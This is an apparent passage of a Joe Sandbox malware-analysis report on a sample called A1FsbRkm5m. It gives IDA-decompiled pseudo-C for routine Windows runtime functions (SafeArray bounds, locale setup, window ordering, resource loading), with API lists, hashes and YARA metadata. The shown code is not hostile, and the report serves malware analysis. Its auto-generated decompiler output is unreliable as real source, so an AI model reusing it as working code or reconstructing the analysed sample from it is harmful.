                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                          • API String ID: 1646373207-3712701948
                                                                                                                                                                                          • Opcode ID: 43ed1c233b8431e60244e37b4123486ffc539a6091bd58410c1b071844e72ba0
                                                                                                                                                                                          • Instruction ID: 06fc51cb68962c5c382d4d7a2f86af93b26a51ec458fff072f92dd4ff1898c2b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 43ed1c233b8431e60244e37b4123486ffc539a6091bd58410c1b071844e72ba0
                                                                                                                                                                                          • Instruction Fuzzy Hash: CFD09E62A043C55AF700BBA6A9EA7162658D720344B24C83BA000773D2D7FD4C94979D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004107F0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                          			E004107F0(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E00410638(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040F78C();
							E00410638(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040F794();
							E00410638(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E00410794(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E00410764(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040F79C();
						E00410638(_v780);
						E004109E8(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040F320();
				return E00410638(_v776);
			}






















                                                                                                                                                                                          0x004107fc
                                                                                                                                                                                          0x0041080c
                                                                                                                                                                                          0x00410813
                                                                                                                                                                                          0x00410813
                                                                                                                                                                                          0x0041081e
                                                                                                                                                                                          0x0041082c
                                                                                                                                                                                          0x0041083b
                                                                                                                                                                                          0x00410859
                                                                                                                                                                                          0x0041083d
                                                                                                                                                                                          0x00410848
                                                                                                                                                                                          0x00410848
                                                                                                                                                                                          0x00410868
                                                                                                                                                                                          0x00410874
                                                                                                                                                                                          0x00410877
                                                                                                                                                                                          0x00410879
                                                                                                                                                                                          0x0041087a
                                                                                                                                                                                          0x0041087c
                                                                                                                                                                                          0x00410882
                                                                                                                                                                                          0x00410884
                                                                                                                                                                                          0x00410893
                                                                                                                                                                                          0x00410894
                                                                                                                                                                                          0x0041089e
                                                                                                                                                                                          0x0041089f
                                                                                                                                                                                          0x004108a4
                                                                                                                                                                                          0x004108af
                                                                                                                                                                                          0x004108b0
                                                                                                                                                                                          0x004108ba
                                                                                                                                                                                          0x004108bb
                                                                                                                                                                                          0x004108c0
                                                                                                                                                                                          0x004108db
                                                                                                                                                                                          0x004108dd
                                                                                                                                                                                          0x004108de
                                                                                                                                                                                          0x004108e1
                                                                                                                                                                                          0x004108e1
                                                                                                                                                                                          0x00410882
                                                                                                                                                                                          0x004108ea
                                                                                                                                                                                          0x004108ed
                                                                                                                                                                                          0x004108ef
                                                                                                                                                                                          0x004108f0
                                                                                                                                                                                          0x004108f6
                                                                                                                                                                                          0x004108fc
                                                                                                                                                                                          0x004108fe
                                                                                                                                                                                          0x00410900
                                                                                                                                                                                          0x00410903
                                                                                                                                                                                          0x00410906
                                                                                                                                                                                          0x00410906
                                                                                                                                                                                          0x00410909
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410909
                                                                                                                                                                                          0x00410909
                                                                                                                                                                                          0x00410910
                                                                                                                                                                                          0x0041091b
                                                                                                                                                                                          0x00410923
                                                                                                                                                                                          0x0041092a
                                                                                                                                                                                          0x00410931
                                                                                                                                                                                          0x00410932
                                                                                                                                                                                          0x00410937
                                                                                                                                                                                          0x00410942
                                                                                                                                                                                          0x00410942
                                                                                                                                                                                          0x00410950
                                                                                                                                                                                          0x00410954
                                                                                                                                                                                          0x0041095a
                                                                                                                                                                                          0x0041095b
                                                                                                                                                                                          0x0041096b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0041089F
                                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004108BB
                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410932
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0041095B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 920484758-0
                                                                                                                                                                                          • Opcode ID: 76866f80c1fb9548e8f656df92ca110dcae0ffd1b6206871227871665d4137d6
                                                                                                                                                                                          • Instruction ID: 03341164d2f6fde75e1a46505fe440e945d96e45a0ae1fefe7a635db93ae447a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 76866f80c1fb9548e8f656df92ca110dcae0ffd1b6206871227871665d4137d6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D412C75A0121D8FCB61EB59C890AC9B3BCAF48314F0041EAE54CE7202DA78AFC58F54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040CED0 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040CED0(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x49e668; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040CEC4(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
				_t74 = 0x40d050;
				_t86 = 0x40d050;
				_t83 =  *0x408034; // 0x408080
				if(E00403D78(_t87, _t83) != 0) {
					_t74 = E00404E80( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00409F88(_t74, 0x40d050);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40d054;
					}
				}
				_t51 =  *0x49ddfc; // 0x407dac
				_t16 = _t51 + 4; // 0xffd1
				_t53 =  *0x49e668; // 0x400000
				LoadStringA(E00405FDC(_t53),  *_t16,  &_v790, 0x100);
				E00403B3C( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E0040A624(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00409F88(_v8, _t86);
			}































                                                                                                                                                                                          0x0040ced0
                                                                                                                                                                                          0x0040cedc
                                                                                                                                                                                          0x0040cedf
                                                                                                                                                                                          0x0040cee1
                                                                                                                                                                                          0x0040ceed
                                                                                                                                                                                          0x0040cefc
                                                                                                                                                                                          0x0040cf26
                                                                                                                                                                                          0x0040cf2c
                                                                                                                                                                                          0x0040cf38
                                                                                                                                                                                          0x0040cf3d
                                                                                                                                                                                          0x0040cf43
                                                                                                                                                                                          0x0040cf43
                                                                                                                                                                                          0x0040cf61
                                                                                                                                                                                          0x0040cf66
                                                                                                                                                                                          0x0040cf6b
                                                                                                                                                                                          0x0040cf72
                                                                                                                                                                                          0x0040cf7f
                                                                                                                                                                                          0x0040cf89
                                                                                                                                                                                          0x0040cf8d
                                                                                                                                                                                          0x0040cf94
                                                                                                                                                                                          0x0040cf9d
                                                                                                                                                                                          0x0040cf9d
                                                                                                                                                                                          0x0040cf94
                                                                                                                                                                                          0x0040cfae
                                                                                                                                                                                          0x0040cfb3
                                                                                                                                                                                          0x0040cfb7
                                                                                                                                                                                          0x0040cfc2
                                                                                                                                                                                          0x0040cfcf
                                                                                                                                                                                          0x0040cfda
                                                                                                                                                                                          0x0040cfe0
                                                                                                                                                                                          0x0040cfed
                                                                                                                                                                                          0x0040cff3
                                                                                                                                                                                          0x0040cffd
                                                                                                                                                                                          0x0040d003
                                                                                                                                                                                          0x0040d00a
                                                                                                                                                                                          0x0040d010
                                                                                                                                                                                          0x0040d017
                                                                                                                                                                                          0x0040d01d
                                                                                                                                                                                          0x0040d039
                                                                                                                                                                                          0x0040d04c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                          • LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                                                                          • Opcode ID: e45e4c57341b6dc192ccf33cb1743639e86da6a5a6db00ca1565249a5d44e2f6
                                                                                                                                                                                          • Instruction ID: b6cc919b410ec48c376b57bdd6b10f9d41704385299fbac947e4ea08e3070186
                                                                                                                                                                                          • Opcode Fuzzy Hash: e45e4c57341b6dc192ccf33cb1743639e86da6a5a6db00ca1565249a5d44e2f6
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE414270A002589BDB21DB69CC85BDAB7FDAB18305F0441FAA548F7282D7789F84CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E174 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040E174() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x49e744 = 0x409;
				 *0x49e748 = 9;
				 *0x49e74c = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x49e744 = _t14;
				}
				if(_t14 != 0) {
					 *0x49e748 = _t14 & 0x3ff;
					 *0x49e74c = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x49b134, 0x40e2c8, 8 << 2);
				if( *0x49b0ec != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x49e751 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x49e750 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040E0FC(__eflags, _t49);
					}
				} else {
					_t20 = E0040E15C();
					if(_t20 != 0) {
						 *0x49e751 = 0;
						 *0x49e750 = 0;
						return _t20;
					}
					E0040E0FC(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00403718(0x49b134, 0x20, 0x40e2c8);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x49e750 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x49e751 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x49e744; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x49e751 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















                                                                                                                                                                                          0x0040e180
                                                                                                                                                                                          0x0040e18a
                                                                                                                                                                                          0x0040e194
                                                                                                                                                                                          0x0040e19e
                                                                                                                                                                                          0x0040e1a5
                                                                                                                                                                                          0x0040e1a7
                                                                                                                                                                                          0x0040e1a7
                                                                                                                                                                                          0x0040e1af
                                                                                                                                                                                          0x0040e1bb
                                                                                                                                                                                          0x0040e1c7
                                                                                                                                                                                          0x0040e1c7
                                                                                                                                                                                          0x0040e1db
                                                                                                                                                                                          0x0040e1e4
                                                                                                                                                                                          0x0040e293
                                                                                                                                                                                          0x0040e298
                                                                                                                                                                                          0x0040e29d
                                                                                                                                                                                          0x0040e2a4
                                                                                                                                                                                          0x0040e2a9
                                                                                                                                                                                          0x0040e2ab
                                                                                                                                                                                          0x0040e2ae
                                                                                                                                                                                          0x0040e2b4
                                                                                                                                                                                          0x0040e2b6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040e2be
                                                                                                                                                                                          0x0040e1ea
                                                                                                                                                                                          0x0040e1ea
                                                                                                                                                                                          0x0040e1f1
                                                                                                                                                                                          0x0040e1f3
                                                                                                                                                                                          0x0040e1fa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040e1fa
                                                                                                                                                                                          0x0040e207
                                                                                                                                                                                          0x0040e217
                                                                                                                                                                                          0x0040e219
                                                                                                                                                                                          0x0040e21e
                                                                                                                                                                                          0x0040e221
                                                                                                                                                                                          0x0040e227
                                                                                                                                                                                          0x0040e229
                                                                                                                                                                                          0x0040e22b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040e22b
                                                                                                                                                                                          0x0040e237
                                                                                                                                                                                          0x0040e23c
                                                                                                                                                                                          0x0040e242
                                                                                                                                                                                          0x0040e242
                                                                                                                                                                                          0x0040e244
                                                                                                                                                                                          0x0040e245
                                                                                                                                                                                          0x0040e246
                                                                                                                                                                                          0x0040e246
                                                                                                                                                                                          0x0040e262
                                                                                                                                                                                          0x0040e268
                                                                                                                                                                                          0x0040e26d
                                                                                                                                                                                          0x0040e272
                                                                                                                                                                                          0x0040e278
                                                                                                                                                                                          0x0040e278
                                                                                                                                                                                          0x0040e27c
                                                                                                                                                                                          0x0040e27f
                                                                                                                                                                                          0x0040e285
                                                                                                                                                                                          0x0040e287
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040e289
                                                                                                                                                                                          0x0040e28c
                                                                                                                                                                                          0x0040e28c
                                                                                                                                                                                          0x0040e28d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040e28d
                                                                                                                                                                                          0x0040e278
                                                                                                                                                                                          0x0040e2c5
                                                                                                                                                                                          0x0040e2c5
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040E268
                                                                                                                                                                                          • GetThreadLocale.KERNEL32 ref: 0040E19E
                                                                                                                                                                                            • Part of subcall function 0040E0FC: GetCPInfo.KERNEL32(00000000,?), ref: 0040E115
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLocaleStringThreadType
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1505017576-0
                                                                                                                                                                                          • Opcode ID: 1b5189a54573d4c7bc765412fd1a201bd6ca0c6f5f23b6c438d2b3680be01391
                                                                                                                                                                                          • Instruction ID: 1e0c14cada7a8142f74d55e3307cde86d26a5cdea6c2c893cd231fda4e8750a6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b5189a54573d4c7bc765412fd1a201bd6ca0c6f5f23b6c438d2b3680be01391
                                                                                                                                                                                          • Instruction Fuzzy Hash: C13124316443958AE720D7A7AC017663B99E762344F0888FFE484AB3D2EB7C4855876F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00459634 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00459634(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x49ebb8; // 0x0
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E004595C4, _t37);
						_t5 = _t27 + 0x90; // 0x0
						_t17 =  *_t5;
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t10 = _t27 + 0x90; // 0x0
							_t17 =  *_t10;
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t13 = _t27 + 0x90; // 0x0
									_t17 = SetWindowPos(E0041AC6C( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}











                                                                                                                                                                                          0x00459636
                                                                                                                                                                                          0x00459639
                                                                                                                                                                                          0x0045963b
                                                                                                                                                                                          0x00459644
                                                                                                                                                                                          0x00459651
                                                                                                                                                                                          0x0045965a
                                                                                                                                                                                          0x0045965d
                                                                                                                                                                                          0x00459669
                                                                                                                                                                                          0x0045966e
                                                                                                                                                                                          0x0045966e
                                                                                                                                                                                          0x00459678
                                                                                                                                                                                          0x00459686
                                                                                                                                                                                          0x00459688
                                                                                                                                                                                          0x00459695
                                                                                                                                                                                          0x00459697
                                                                                                                                                                                          0x00459697
                                                                                                                                                                                          0x0045969e
                                                                                                                                                                                          0x0045969e
                                                                                                                                                                                          0x004596a7
                                                                                                                                                                                          0x004596ab
                                                                                                                                                                                          0x004596ad
                                                                                                                                                                                          0x004596c1
                                                                                                                                                                                          0x004596cd
                                                                                                                                                                                          0x004596d2
                                                                                                                                                                                          0x004596d3
                                                                                                                                                                                          0x004596ad
                                                                                                                                                                                          0x004596ab
                                                                                                                                                                                          0x00459678
                                                                                                                                                                                          0x004596d8
                                                                                                                                                                                          0x004596d8
                                                                                                                                                                                          0x004596e2

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnumWindows.USER32(004595C4), ref: 00459669
                                                                                                                                                                                          • GetWindow.USER32(00000003,00000003), ref: 00459681
                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 0045968E
                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 004596CD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$EnumLongWindows
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4191631535-0
                                                                                                                                                                                          • Opcode ID: c1819d15f6b1152034b058a47bfdea8cc9a2f81b5cb0d7028b19d9998be7cabc
                                                                                                                                                                                          • Instruction ID: e023c87b117193a46b59b10cd2d90065ddfa048c4e1cca94785ca85305bb7b15
                                                                                                                                                                                          • Opcode Fuzzy Hash: c1819d15f6b1152034b058a47bfdea8cc9a2f81b5cb0d7028b19d9998be7cabc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 49117331609210AFD711EB28CC85F9673D4AB05765F18017AFDA8AF2D3C378AC49C75A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041E198 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                          			E0041E198(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E0041E128(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x41e23c
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E0041E128(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x41e23c
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x41dd60
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E0041DD20(_t23, _t25, _t18);
			}

















                                                                                                                                                                                          0x0041e19f
                                                                                                                                                                                          0x0041e1a2
                                                                                                                                                                                          0x0041e1a4
                                                                                                                                                                                          0x0041e1b4
                                                                                                                                                                                          0x0041e1b6
                                                                                                                                                                                          0x0041e1b9
                                                                                                                                                                                          0x0041e1bb
                                                                                                                                                                                          0x0041e1be
                                                                                                                                                                                          0x0041e1c3
                                                                                                                                                                                          0x0041e1c3
                                                                                                                                                                                          0x0041e1c4
                                                                                                                                                                                          0x0041e1ce
                                                                                                                                                                                          0x0041e1d0
                                                                                                                                                                                          0x0041e1d3
                                                                                                                                                                                          0x0041e1d5
                                                                                                                                                                                          0x0041e1d8
                                                                                                                                                                                          0x0041e1dd
                                                                                                                                                                                          0x0041e1de
                                                                                                                                                                                          0x0041e1e8
                                                                                                                                                                                          0x0041e1e9
                                                                                                                                                                                          0x0041e1ed
                                                                                                                                                                                          0x0041e1f6
                                                                                                                                                                                          0x0041e201

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindResourceA.KERNEL32(?,?,?), ref: 0041E1AF
                                                                                                                                                                                          • LoadResource.KERNEL32(?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1C9
                                                                                                                                                                                          • SizeofResource.KERNEL32(?,0041E23C,?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1E3
                                                                                                                                                                                          • LockResource.KERNEL32(0041DD60,00000000,?,0041E23C,?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1ED
